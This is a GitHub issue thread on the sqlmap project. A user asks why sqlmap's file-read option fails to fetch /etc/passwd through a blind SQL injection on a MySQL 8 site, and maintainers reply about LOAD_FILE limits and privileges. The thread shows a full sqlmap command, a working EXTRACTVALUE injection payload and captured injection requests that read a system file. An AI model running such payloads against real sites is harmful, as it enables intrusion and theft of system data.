search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.72k stars 5.74k forks source link

File-Read Command in SQLMap Despite Admin / And Privileges #5774

Closed agx47 closed 2 months ago

agx47 commented 3 months ago

Hello,

I’m experiencing an issue when running the file-read command. Although I am the admin and have all the necessary privileges, this specific command is not working, even though other commands function correctly.

Here’s what I’ve tried: sqlmap.py -u "https://target.com/index.php?route=" --technique=BE --file-read=/etc/passwd -t traffic.html --risk=2 --level=5 --fresh-queries --no-cast also tried --hex and tamper=between

Sqlmap reponse : Parameter: post_id (GET) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: route=extension/d_blog_module/post&post_id=18' AND EXTRACTVALUE(4226,CASE WHEN (4226=4226) THEN 4226 ELSE 0x3A END) AND 'UFKR'='UFKR

[19:46:02] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL 8 [19:46:02] [INFO] fingerprinting the back-end DBMS operating system [19:46:04] [WARNING] reflective value(s) found and filtering out [19:46:04] [INFO] the back-end DBMS operating system is Linux [19:46:04] [INFO] fetching file: '/etc/passwd' [19:46:04] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [19:46:04] [INFO] retrieved:

Traffic html reponse that i capture : &post_id=18%27%20AND%20EXTRACTVALUE%284764%2CCASE%20WHEN%20%280x57%3DUPPER%28MID%28%40%40version_compile_os%2C1%2C1%29%29%29%20THEN%204764%20ELSE%200x3A%20END%29%20AND%20%27dwQo%27%3D%27dwQo Fatal error: Uncaught Exception: Error: XPATH syntax error: ':' Error No: 1105

post_id=18%27%20AND%20EXTRACTVALUE%283497%2CCASE%20WHEN%20%28ORD%28MID%28%28HEX%28LOAD_FILE%280x2f6574632f706173737764%29%29%29%2C1%2C1%29%29%3E66%29%20THEN%203497%20ELSE%200x3A%20END%29%20AND%20%27CZYM%27%3D%27CZYM Fatal error: Uncaught Exception: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';66) THEN 3497 ELSE 0x3A END) AND 'CZYM'='CZYM' AND p.status = '1' AND pd.langua' at line 1 Error No: 1064

im a noob and i admit it so im i doing something Wrong ? !

selectfromblackhydra commented 3 months ago

mysql 8 not allowed read file using load_file only mysql 5 can read file using load_file sorry if im wrong

agx47 commented 3 months ago

That would make sense if you are sure ...

stamparm commented 2 months ago

I am the admin and have all the necessary privileges <- no, you don't have all necessary privileges.

image

References: